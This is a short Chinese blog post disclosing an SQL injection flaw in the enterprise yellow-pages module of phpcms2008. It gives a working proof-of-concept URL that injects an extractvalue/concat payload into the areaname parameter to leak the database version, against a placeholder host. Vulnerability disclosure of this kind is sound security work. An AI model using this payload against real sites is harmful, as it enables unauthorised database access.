当前位置: iick's blog > 网站漏洞 > phpcms2008企业黄页模块SQL注射漏洞

phpcms2008企业黄页模块SQL注射漏洞

作者:hack1990 时间:12-05-12 阅读数:639人阅读

phpcms 企业黄页模块由于参数未过滤存在SQL注射漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦.

漏洞证明:
http://www.xxxx.com /phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271

# Nmap Security Scanner 7.0

上一篇:羊驼CMS sql injection & getShell

下一篇:记录PHPWIND论坛明文登陆密码

相关文章

评论列表

  •  
    发布于 2012-05-13 20:19:43  回复
  • 纯技术博客,拜读了。

发表评论